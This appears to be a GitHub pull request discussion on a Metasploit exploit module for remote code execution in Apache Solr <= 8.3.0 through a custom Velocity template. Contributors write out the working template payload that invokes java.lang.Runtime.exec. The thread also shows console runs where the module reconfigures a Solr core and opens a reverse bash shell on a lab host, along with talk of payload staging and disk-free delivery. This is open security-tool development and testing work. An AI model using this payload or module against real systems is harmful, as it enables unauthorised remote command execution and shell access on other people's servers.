 #set($str=$x.class.forName("java.lang.String"))
 #set($ex=$rt.getRuntime().exec("placeholder"))
 $ex.waitFor() #set($out=$ex.getInputStream())
 #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
=> nil
irb(main):012:0> template.inspect
=> "\" #set($x=\\\"\\\")\\n #set($rt=$x.class.forName(\\\"java.lang.Runtime\\\"))\\n #set($chr=$x.class.forName(\\\"java.lang.Character\\\"))\\n #set($str=$x.class.forName(\\\"java.lang.String\\\"))\\n #set($ex=$rt.getRuntime().exec(\\\"placeholder\\\"))\\n $ex.waitFor() #set($out=$ex.getInputStream())\\n #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end\\n\""
irb(main):013:0> 
```

2019-12-29 02:00 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    template = ('#set($x="") ' \
Using the `heredoc`:

```
msf5 exploit(multi/http/solr_velocity_rce) > exploit

[*] Started reverse TCP handler on 192.168.35.1:4444 
[!] Authentication required for 192.168.35.130:80!
[*] Attempting authentication for 192.168.35.130:80...
[+] Authentication succeeded!
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Found core(s): techproducts
[*] Targeting core 'techproducts'
[*]       0         /
        b
        i
        n
        /
        b
        a
        s
        h
        


[-] Exploit aborted due to failure: no-target: Bash not found, aborting exploit attempt!
[*] Exploit completed, but no session was created.
msf5 exploit(multi/http/solr_velocity_rce) > 
```
![heredoc1](https://user-images.githubusercontent.com/21966757/71551404-9c224380-2a21-11ea-8351-365633e4a637.png)
![heredoc2](https://user-images.githubusercontent.com/21966757/71551405-9f1d3400-2a21-11ea-9171-b6a8f533260a.png)

This doesn't happen if the 3 final lines of the template are written together as:
```
#foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
```

2019-12-29 02:01 UTC, bcoles commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    template = ('#set($x="") ' \
You can wrap them into one line in a heredoc.

```ruby
    template = <<-EOF
      #set($x="")
      #set($rt=$x.class.forName("java.lang.Runtime"))
      #set($chr=$x.class.forName("java.lang.Character"))
      #set($str=$x.class.forName("java.lang.String"))
      #set($ex=$rt.getRuntime().exec("#{cmd}"))
      $ex.waitFor() #set($out=$ex.getInputStream())
      #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
EOF
```

2019-12-29 04:04 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    template = ('#set($x="") ' \
Fixed in commit 44489f03263e592aeba821ea2371d559501c1b25.

2019-12-29 04:16 UTC, ide0x90 commented
The `CmdStager` writes the Base64 encoded payload to a file. During the exploit, the file gets written just fine, but each chunk of the payload is written twice to the file, so it doesn't decode properly at the end. I have decided to scrap `CmdStager` compatibility at this point as I am unable to pinpoint why exactly this happens.

2019-12-29 04:26 UTC, bcoles commented
> 
> 
> The `CmdStager` writes the Base64 encoded payload to a file. During the exploit, the file gets written just fine, but each chunk of the payload is written twice to the file, so it doesn't decode properly at the end. I have decided to scrap `CmdStager` compatibility at this point as I am unable to pinpoint why exactly this happens.

Is it possible that the template is simply executed twice? Is it possible / feasible to use some equivalent of `exit` at the end of the template to prevent further execution?

Ideally, the underlying vulnerability should be analyzed further. Checking for `bash` is nice, but messy. Likewise, relying on base64 decoding on the server side shell is also messy.

`curl` / `wget` command stagers would probably work, but would require a custom encoder due to the limitation on using spaces.

2020-01-31 08:09 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
It turns out that Base64 encoding wasn't even necessary. The problem lies in a limitation of the Java Runtime.exec() method, and this is easily circumvented by using a technique described at https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html.

2020-03-09 13:52 UTC, jmartin-r7 commented
@msjenkins-r7 test this please.

2020-03-18 18:50 UTC, smcintyre-r7 requested changes
This is a fantastic module, it's obvious that alot of work went into it so thank you! I tested it using the 8.2.0 version from docker (instead of the 8.3.0 version to get more coverage) and both the check and exploit functions worked as intended.

Pretty much all my comments on the PR fall into one of two categories, either trivial changes around the docs or how payloads and targets are handled. I really like that you're trying to support both commands and native payloads on both the Windows and Linux platforms, that's awesome 👍 . However, I think you should define additional targets to do this. There should likely be 2 more targets defined, one for Windows Powershell (vs one that always uses the CMD Stager) and one for Windows command. Set the `'Type'` key in each for whatever makes sense for your usage but then please use that instead of checking the name of the payload datastore option. Modules can be renamed, and while this is rare it's something we'd like to account for in the future.

2020-03-18 18:50 UTC, smcintyre-r7 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        # no PowerShell? revert to CmdStager
These should really be separate targets that can be specified by the user. It's often desirable for the operator to specify CmdStager (possibly with a custom EXE template) vs Powershell (which is often disabled).  I would definitely prefer to see these as explicit targets for the operator to select. If Powershell is unavailable and it was the target that was selected, the module should `fail_with(Failure::NoTarget, 'Powershell was not found')`.

2020-03-18 18:50 UTC, smcintyre-r7 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      if datastore['PAYLOAD'].include?("windows/exec") || datastore['PAYLOAD'].include?("windows/x64/exec")
If you want to support windows command payloads, you should configure another target of `ARCH_CMD` where the platform is Windows. Set a `Type` in there like the Windows ones do, and use that to determine that it's a command that should be executed. That would then allow people to use all of the Windows command payloads instead of just the`windows/exec` one which could be replaced with the `generic` one that allows a user-specified command to be executed.

Most importantly what we want to avoid here is inspecting the these types of attributes of the payload which could change, for example if we decided to rename the payloads.

2020-03-18 18:50 UTC, smcintyre-r7 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        if datastore['PAYLOAD'] == "cmd/unix/generic"
Similar to the comment I left for the Windows equivalent, you should not be checking the payload name but instead be using a target of `ARCH_CMD` combined with a `Type` specified to whatever you'd like such as `:unix_memory`.

2020-03-18 18:50 UTC, smcintyre-r7 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    if opts['winenv_check'] || exec_payloads.include?(datastore['PAYLOAD'])
This again should be checking if the target selected is trying to execute a command or not via a `Type` parameter.

2020-03-28 16:40 UTC, ide0x90 commented on documentation/modules/exploit/multi/http/solr_velocity_rce.md
> +**From the Tenable advisory**:
Absolutely, I added the link in the latest commit.

2020-03-28 16:41 UTC, ide0x90 commented on documentation/modules/exploit/multi/http/solr_velocity_rce.md
> +Apache Solr <= 8.3.0
Shoot. It's `<=8.3.0`, changed in latest commit.

2020-03-28 16:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +          This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom
Changed to `<=8.3.0` in latest commit.

2020-03-28 16:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        # no PowerShell? revert to CmdStager
Changed in commit 861b79bce7d4ac408e462d2a1b19e7d72cfe82f8.

2020-03-28 16:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +      if datastore['PAYLOAD'].include?("windows/exec") || datastore['PAYLOAD'].include?("windows/x64/exec")
Aye. Commit 861b79bce7d4ac408e462d2a1b19e7d72cfe82f8 should take care of this.

2020-03-28 16:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +        if datastore['PAYLOAD'] == "cmd/unix/generic"
Changed in commit 861b79bce7d4ac408e462d2a1b19e7d72cfe82f8

2020-03-28 16:41 UTC, ide0x90 commented on modules/exploits/multi/http/solr_velocity_rce.rb
> +    if opts['winenv_check'] || exec_payloads.include?(datastore['PAYLOAD'])
Also changed in commit 861b79bce7d4ac408e462d2a1b19e7d72cfe82f8

2020-04-02 15:27 UTC, bwatters-r7 approved these changes

2020-04-02 16:19 UTC, bwatters-r7 commented
```
msf5 exploit(multi/http/solr_velocity_rce) > show options

Module options (exploit/multi/http/solr_velocity_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   SolrRocks        no        Solr password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.135.190  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8983             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /solr/           no        Path to Solr
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   solr             no        Solr username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_bash):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix (in-memory)


msf5 exploit(multi/http/solr_velocity_rce) > set lhost 192.168.135.168
lhost => 192.168.135.168
msf5 exploit(multi/http/solr_velocity_rce) > run

[*] Started reverse TCP handler on 192.168.135.168:4444 
[*] Found Apache Solr 8.3.0
[*] OS version is Linux amd64 4.9.0-11-amd64
[*] Full uname is 'Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux'
[*] Found core(s): techproducts
[+] Found Velocity Response Writer in use by core techproducts
[!] params.resource.loader.enabled for core techproducts is set to false.
[*] Targeting core 'techproducts'
[*] params.resource.loader.enabled is false, setting it to true...
[+] params.resource.loader.enabled is now set to true!
[*] Command shell session 1 opened (192.168.135.168:4444 -> 192.168.135.190:58284) at 2020-04-02 11:18:29 -0500
whoami

solr

```

2020-04-02 16:24 UTC, merged

2020-04-02 16:24 UTC, bwatters-r7 commented
# Release Notes
This is a module for the vulnerability present in Apache Solr <= 8.3.0 which allows remote code execution via a custom Velocity template.

2020-04-03 06:14 UTC, ide0x90 commented
Thanks a lot, @acammack-r7 , @bcoles , @smcintyre-r7 , and @bwatters-r7 !

2020-04-03 22:16 UTC, schierlm commented
It somehow makes me sad that this is an ideal exploit for an ARCH_JAVA target, but it does not even have one. And also that ARCH_JAVA somehow gets rotten and not updated with latest stuff like calling out to PowerShell or command stagers, so that other targets are even needed. But yeah, Java is dead in the browser, so probably not worth the effort of supporting that ARCH any more...

A velocity template to load Java payloads is here: https://github.com/schierlm/JavaPayload/blob/master/JavaPayload/templates/ApacheVelocity.vt Probably needs some updating to use java.util.Base64 instead of sun.misc.Base64Decoder, but yeah.

ping @timwr to cry with me...

2020-04-08 06:37 UTC, timwr commented
@schierlm I agree that this module would have been ideal for ARCH_JAVA. It's not too late to implement it. Also let me know if there is anything we can add to keep ARCH_JAVA up to date with the other meterpreters. There are even a few features (screenshot, mouse, keys, etc) that are available that are not available on other non-native meterpreters (e.g python, php).

2020-04-08 09:09 UTC, schierlm commented
@timwr 
The problem with ARCH_JAVA I'm seeing is not about the feature set of Java Meterpreter (which is quite good, and until Project Panama lands in the JDK I cannot think of features that would be a good addition there - migration via JDI Attach API might be possible but usually there are no other interesting Java processes around you could migrate into), but the upgrade path from ARCH_JAVA to native. The whole payload loader was designed in a time where the favourite "upgrade" path was dropping an executable to disk. Nowadays, with "diskless" ways like piping stuff into PowerShell, which are also supported by most newer exploits directly, after having obtained a Java Meterpreter session and detecting that your target is Windows (and therefore you'd like a native meterpreter so you can migrate into other processes), you are at the dilemma to decide whether you should try upgrading your Meterpreter by dropping an EXE (risking Antivirus detection) or re-exploiting the service (risking potentially crashing the service). Maybe I'm missing something (I only very rarely use Metasploit nowadays).

2020-04-08 13:12 UTC, zeroSteiner commented
Yeah we don't really have a module for "upgrading" from one meterpreter type to another, just a shell from one to another. If I were going to do it personally though, I'd look at using the [`exploit/multi/script/web_delivery`](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/script/web_delivery.rb) and you'd have multiple options (IIRC) none of which drop to disk, you'd just have to manually copy-paste the command.